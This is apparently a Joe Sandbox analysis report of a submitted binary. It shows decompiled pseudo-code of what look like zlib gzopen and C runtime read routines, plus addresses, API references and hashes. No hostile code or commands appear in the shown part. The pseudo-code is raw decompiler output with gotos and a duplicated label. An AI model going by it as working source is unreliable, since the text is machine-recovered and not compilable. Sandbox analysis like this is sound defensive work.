                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                        				_t91 = __eax;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                        					_t101 = _t100 + 4;
                                                                                                                                                                                                        					if(_t93 == 0) {
                                                                                                                                                                                                        						L31:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                                                                                                        						 *_t93 = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                        						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                        						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                        						_t102 = _t101 + 0xc;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                        						_t87 = _t57 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t82 =  *_t57;
                                                                                                                                                                                                        							_t57 = _t57 + 1;
                                                                                                                                                                                                        						} while (_t82 != 0);
                                                                                                                                                                                                        						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                        						_t103 = _t102 + 4;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                        						if(_t60 == 0) {
                                                                                                                                                                                                        							L30:
                                                                                                                                                                                                        							E00405160(0, _t87, _t93);
                                                                                                                                                                                                        							goto L31;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                        							_t88 = _t60;
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							if( *_t91 == 0x72) {
                                                                                                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t63 =  *_t91;
                                                                                                                                                                                                        							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t64 =  *_t91;
                                                                                                                                                                                                        							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                        								__eflags = _t64 - 0x66;
                                                                                                                                                                                                        								if(_t64 != 0x66) {
                                                                                                                                                                                                        									__eflags = _t64 - 0x68;
                                                                                                                                                                                                        									if(_t64 != 0x68) {
                                                                                                                                                                                                        										__eflags = _t64 - 0x52;
                                                                                                                                                                                                        										if(_t64 != 0x52) {
                                                                                                                                                                                                        											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                                                                                                        											 *_t89 = _t64;
                                                                                                                                                                                                        											_t87 = _t89 + 1;
                                                                                                                                                                                                        											__eflags = _t87;
                                                                                                                                                                                                        											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t98 = _t64 - 0x30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                                                                        							if(_t64 == 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t87 = _t103 + 0x68;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L26:
                                                                                                                                                                                                        							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                                                                                                        							if(_t65 == 0) {
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(_t65 != 0x77) {
                                                                                                                                                                                                        									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                        									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                                                                                                        									 *_t93 = _t66;
                                                                                                                                                                                                        									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                                                                                                        									_t104 = _t103 + 0x14;
                                                                                                                                                                                                        									__eflags = _t67;
                                                                                                                                                                                                        									if(_t67 != 0) {
                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L34;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(0x38);
                                                                                                                                                                                                        									_push("1.2.3");
                                                                                                                                                                                                        									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                                                                                                        									_push(8);
                                                                                                                                                                                                        									_push(0xfffffff1);
                                                                                                                                                                                                        									_push(8);
                                                                                                                                                                                                        									_push(_t98);
                                                                                                                                                                                                        									_push(_t93);
                                                                                                                                                                                                        									_t91 = E00404CE0();
                                                                                                                                                                                                        									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                        									_t104 = _t103 + 0x24;
                                                                                                                                                                                                        									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                                                                                                        									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                                                                                                        									if(_t91 != 0 || _t79 == 0) {
                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                                                                                                        										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                                                                                                                                                        										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										_push(_t104 + 0x18);
                                                                                                                                                                                                        										if(__eflags >= 0) {
                                                                                                                                                                                                        											_push(_t69);
                                                                                                                                                                                                        											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                        											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                                                                                                        											_t70 = E0040CB9D();
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                                                                                                        										__eflags = _t70;
                                                                                                                                                                                                        										if(_t70 == 0) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                                        											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                                        												E00405000(_t93, 0);
                                                                                                                                                                                                        												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                                        												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                                        												__eflags = _t74;
                                                                                                                                                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                                        												return _t93;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                                        												return _t93;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L42;
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t62 =  *_t83;
                                                                                                                                                                                                        							 *_t88 = _t62;
                                                                                                                                                                                                        							_t83 = _t83 + 1;
                                                                                                                                                                                                        							_t88 = _t88 + 1;
                                                                                                                                                                                                        							if(_t62 != 0) {
                                                                                                                                                                                                        								goto L7;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L42:
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x004057b7
                                                                                                                                                                                                        0x004057bf
                                                                                                                                                                                                        0x004057c3
                                                                                                                                                                                                        0x004057c5
                                                                                                                                                                                                        0x004057cd
                                                                                                                                                                                                        0x004059c8
                                                                                                                                                                                                        0x004059ce
                                                                                                                                                                                                        0x004057db
                                                                                                                                                                                                        0x004057e3
                                                                                                                                                                                                        0x004057e5
                                                                                                                                                                                                        0x004057ea
                                                                                                                                                                                                        0x00405921
                                                                                                                                                                                                        0x0040592a
                                                                                                                                                                                                        0x004057f0
                                                                                                                                                                                                        0x004057f3
                                                                                                                                                                                                        0x004057f6
                                                                                                                                                                                                        0x004057f9
                                                                                                                                                                                                        0x004057fc
                                                                                                                                                                                                        0x004057ff
                                                                                                                                                                                                        0x00405801
                                                                                                                                                                                                        0x00405804
                                                                                                                                                                                                        0x00405807
                                                                                                                                                                                                        0x0040580a
                                                                                                                                                                                                        0x0040580d
                                                                                                                                                                                                        0x00405810
                                                                                                                                                                                                        0x00405813
                                                                                                                                                                                                        0x00405816
                                                                                                                                                                                                        0x00405819
                                                                                                                                                                                                        0x0040581c
                                                                                                                                                                                                        0x00405824
                                                                                                                                                                                                        0x00405827
                                                                                                                                                                                                        0x0040582b
                                                                                                                                                                                                        0x0040582e
                                                                                                                                                                                                        0x00405831
                                                                                                                                                                                                        0x00405834
                                                                                                                                                                                                        0x00405837
                                                                                                                                                                                                        0x00405837
                                                                                                                                                                                                        0x00405839
                                                                                                                                                                                                        0x0040583a
                                                                                                                                                                                                        0x00405842
                                                                                                                                                                                                        0x00405847
                                                                                                                                                                                                        0x0040584a
                                                                                                                                                                                                        0x0040584f
                                                                                                                                                                                                        0x0040591c
                                                                                                                                                                                                        0x0040591c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405855
                                                                                                                                                                                                        0x00405855
                                                                                                                                                                                                        0x00405859
                                                                                                                                                                                                        0x0040585b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405870
                                                                                                                                                                                                        0x00405872
                                                                                                                                                                                                        0x00405874
                                                                                                                                                                                                        0x00405874
                                                                                                                                                                                                        0x00405877
                                                                                                                                                                                                        0x0040587b
                                                                                                                                                                                                        0x00405881
                                                                                                                                                                                                        0x00405881
                                                                                                                                                                                                        0x00405885
                                                                                                                                                                                                        0x00405889
                                                                                                                                                                                                        0x00405897
                                                                                                                                                                                                        0x00405899
                                                                                                                                                                                                        0x004058a5
                                                                                                                                                                                                        0x004058a7
                                                                                                                                                                                                        0x004058b3
                                                                                                                                                                                                        0x004058b5
                                                                                                                                                                                                        0x004058c1
                                                                                                                                                                                                        0x004058c5
                                                                                                                                                                                                        0x004058c7
                                                                                                                                                                                                        0x004058c7
                                                                                                                                                                                                        0x004058c8
                                                                                                                                                                                                        0x004058b7
                                                                                                                                                                                                        0x004058b7
                                                                                                                                                                                                        0x004058b7
                                                                                                                                                                                                        0x004058a9
                                                                                                                                                                                                        0x004058a9
                                                                                                                                                                                                        0x004058a9
                                                                                                                                                                                                        0x0040589b
                                                                                                                                                                                                        0x0040589b
                                                                                                                                                                                                        0x0040589b
                                                                                                                                                                                                        0x0040588f
                                                                                                                                                                                                        0x00405892
                                                                                                                                                                                                        0x00405892
                                                                                                                                                                                                        0x004058cc
                                                                                                                                                                                                        0x004058cf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004058d1
                                                                                                                                                                                                        0x004058d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004058db
                                                                                                                                                                                                        0x004058db
                                                                                                                                                                                                        0x004058e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004058e2
                                                                                                                                                                                                        0x004058e4
                                                                                                                                                                                                        0x00405930
                                                                                                                                                                                                        0x0040593f
                                                                                                                                                                                                        0x00405942
                                                                                                                                                                                                        0x00405944
                                                                                                                                                                                                        0x00405949
                                                                                                                                                                                                        0x0040594c
                                                                                                                                                                                                        0x0040594e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405950
                                                                                                                                                                                                        0x00405950
                                                                                                                                                                                                        0x00405953
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405953
                                                                                                                                                                                                        0x004058e6
                                                                                                                                                                                                        0x004058ea
                                                                                                                                                                                                        0x004058ec
                                                                                                                                                                                                        0x004058f1
                                                                                                                                                                                                        0x004058f2
                                                                                                                                                                                                        0x004058f4
                                                                                                                                                                                                        0x004058f6
                                                                                                                                                                                                        0x004058f8
                                                                                                                                                                                                        0x004058f9
                                                                                                                                                                                                        0x00405904
                                                                                                                                                                                                        0x00405906
                                                                                                                                                                                                        0x0040590b
                                                                                                                                                                                                        0x0040590e
                                                                                                                                                                                                        0x00405911
                                                                                                                                                                                                        0x00405916
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405955
                                                                                                                                                                                                        0x00405955
                                                                                                                                                                                                        0x00405955
                                                                                                                                                                                                        0x00405961
                                                                                                                                                                                                        0x00405963
                                                                                                                                                                                                        0x00405967
                                                                                                                                                                                                        0x0040596d
                                                                                                                                                                                                        0x0040596e
                                                                                                                                                                                                        0x0040597c
                                                                                                                                                                                                        0x0040597d
                                                                                                                                                                                                        0x00405970
                                                                                                                                                                                                        0x00405970
                                                                                                                                                                                                        0x00405974
                                                                                                                                                                                                        0x00405975
                                                                                                                                                                                                        0x00405975
                                                                                                                                                                                                        0x00405985
                                                                                                                                                                                                        0x00405988
                                                                                                                                                                                                        0x0040598a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040598c
                                                                                                                                                                                                        0x0040598c
                                                                                                                                                                                                        0x00405990
                                                                                                                                                                                                        0x004059a5
                                                                                                                                                                                                        0x004059ad
                                                                                                                                                                                                        0x004059b6
                                                                                                                                                                                                        0x004059b6
                                                                                                                                                                                                        0x004059b9
                                                                                                                                                                                                        0x004059c5
                                                                                                                                                                                                        0x00405992
                                                                                                                                                                                                        0x00405992
                                                                                                                                                                                                        0x004059a2
                                                                                                                                                                                                        0x004059a2
                                                                                                                                                                                                        0x00405990
                                                                                                                                                                                                        0x0040598a
                                                                                                                                                                                                        0x00405916
                                                                                                                                                                                                        0x004058e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405860
                                                                                                                                                                                                        0x00405860
                                                                                                                                                                                                        0x00405862
                                                                                                                                                                                                        0x00405864
                                                                                                                                                                                                        0x00405865
                                                                                                                                                                                                        0x00405868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040586a
                                                                                                                                                                                                        0x0040586a
                                                                                                                                                                                                        0x0040586d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405868
                                                                                                                                                                                                        0x0040584f
                                                                                                                                                                                                        0x004057ea
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                        • String ID: 1.2.3
                                                                                                                                                                                                        • API String ID: 680241177-2310465506
                                                                                                                                                                                                        • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                        			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                        				intOrPtr* _t92;
                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                        				char _t97;
                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				signed int _t107;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                                                        				intOrPtr* _t114;
                                                                                                                                                                                                        				signed int _t118;
                                                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                        				char* _t121;
                                                                                                                                                                                                        				signed int _t125;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t133;
                                                                                                                                                                                                        				void* _t134;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t125 = __edx;
                                                                                                                                                                                                        				_t121 = _a4;
                                                                                                                                                                                                        				_t119 = _a8;
                                                                                                                                                                                                        				_t131 = 0;
                                                                                                                                                                                                        				_v12 = _t121;
                                                                                                                                                                                                        				_v8 = _t119;
                                                                                                                                                                                                        				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t138 = _t121;
                                                                                                                                                                                                        					if(_t121 != 0) {
                                                                                                                                                                                                        						_t133 = _a20;
                                                                                                                                                                                                        						__eflags = _t133;
                                                                                                                                                                                                        						if(_t133 == 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							__eflags = _t119 - 0xffffffff;
                                                                                                                                                                                                        							if(_t119 != 0xffffffff) {
                                                                                                                                                                                                        								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                                                                                                                                                        								_t134 = _t134 + 0xc;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t133 - _t131;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t94 = _t90 | 0xffffffff;
                                                                                                                                                                                                        								_t125 = _t94 % _a12;
                                                                                                                                                                                                        								__eflags = _a16 - _t94 / _a12;
                                                                                                                                                                                                        								if(__eflags > 0) {
                                                                                                                                                                                                        									goto L3;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L13:
                                                                                                                                                                                                        								_t131 = _a12 * _a16;
                                                                                                                                                                                                        								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                        								_v20 = _t131;
                                                                                                                                                                                                        								_t120 = _t131;
                                                                                                                                                                                                        								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                        									_v16 = 0x1000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t131;
                                                                                                                                                                                                        								if(_t131 == 0) {
                                                                                                                                                                                                        									L40:
                                                                                                                                                                                                        									return _a16;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                        										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                        											L24:
                                                                                                                                                                                                        											__eflags = _t120 - _v16;
                                                                                                                                                                                                        											if(_t120 < _v16) {
                                                                                                                                                                                                        												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                                        												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                                        												if(_t97 == 0xffffffff) {
                                                                                                                                                                                                        													L48:
                                                                                                                                                                                                        													return (_t131 - _t120) / _a12;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags = _v8;
                                                                                                                                                                                                        												if(_v8 == 0) {
                                                                                                                                                                                                        													L44:
                                                                                                                                                                                                        													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                        													if(__eflags != 0) {
                                                                                                                                                                                                        														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                        														_t134 = _t134 + 0xc;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													L4:
                                                                                                                                                                                                        													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                                        													goto L5;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t123 = _v12;
                                                                                                                                                                                                        												_v12 = _v12 + 1;
                                                                                                                                                                                                        												 *_v12 = _t97;
                                                                                                                                                                                                        												_t120 = _t120 - 1;
                                                                                                                                                                                                        												_t70 =  &_v8;
                                                                                                                                                                                                        												 *_t70 = _v8 - 1;
                                                                                                                                                                                                        												__eflags =  *_t70;
                                                                                                                                                                                                        												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                        												goto L39;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _v16;
                                                                                                                                                                                                        											if(_v16 == 0) {
                                                                                                                                                                                                        												_t105 = 0x7fffffff;
                                                                                                                                                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                        												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                        													_t105 = _t120;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                        												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                        													_t55 = _t120 % _v16;
                                                                                                                                                                                                        													__eflags = _t55;
                                                                                                                                                                                                        													_t125 = _t55;
                                                                                                                                                                                                        													_t110 = _t120;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                        													_t110 = 0x7fffffff;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t105 = _t110 - _t125;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t105 - _v8;
                                                                                                                                                                                                        											if(_t105 > _v8) {
                                                                                                                                                                                                        												goto L44;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_push(_t105);
                                                                                                                                                                                                        												_push(_v12);
                                                                                                                                                                                                        												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                        												_pop(_t123);
                                                                                                                                                                                                        												_push(_t106);
                                                                                                                                                                                                        												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                        												_t134 = _t134 + 0xc;
                                                                                                                                                                                                        												__eflags = _t107;
                                                                                                                                                                                                        												if(_t107 == 0) {
                                                                                                                                                                                                        													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                        													goto L48;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                        												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                        													L47:
                                                                                                                                                                                                        													_t80 = _t133 + 0xc;
                                                                                                                                                                                                        													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                        													__eflags =  *_t80;
                                                                                                                                                                                                        													goto L48;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_v12 = _v12 + _t107;
                                                                                                                                                                                                        												_t120 = _t120 - _t107;
                                                                                                                                                                                                        												_v8 = _v8 - _t107;
                                                                                                                                                                                                        												goto L39;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                        										__eflags = _t113;
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L24;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if(__eflags < 0) {
                                                                                                                                                                                                        											goto L47;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t131 = _t120;
                                                                                                                                                                                                        										__eflags = _t120 - _t113;
                                                                                                                                                                                                        										if(_t120 >= _t113) {
                                                                                                                                                                                                        											_t131 = _t113;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t131 - _v8;
                                                                                                                                                                                                        										if(_t131 > _v8) {
                                                                                                                                                                                                        											_t133 = 0;
                                                                                                                                                                                                        											__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                        												_t134 = _t134 + 0xc;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t114 = E0040BFC1(__eflags);
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											 *_t114 = 0x22;
                                                                                                                                                                                                        											_push(_t133);
                                                                                                                                                                                                        											goto L4;
                                                                                                                                                                                                        										} else {
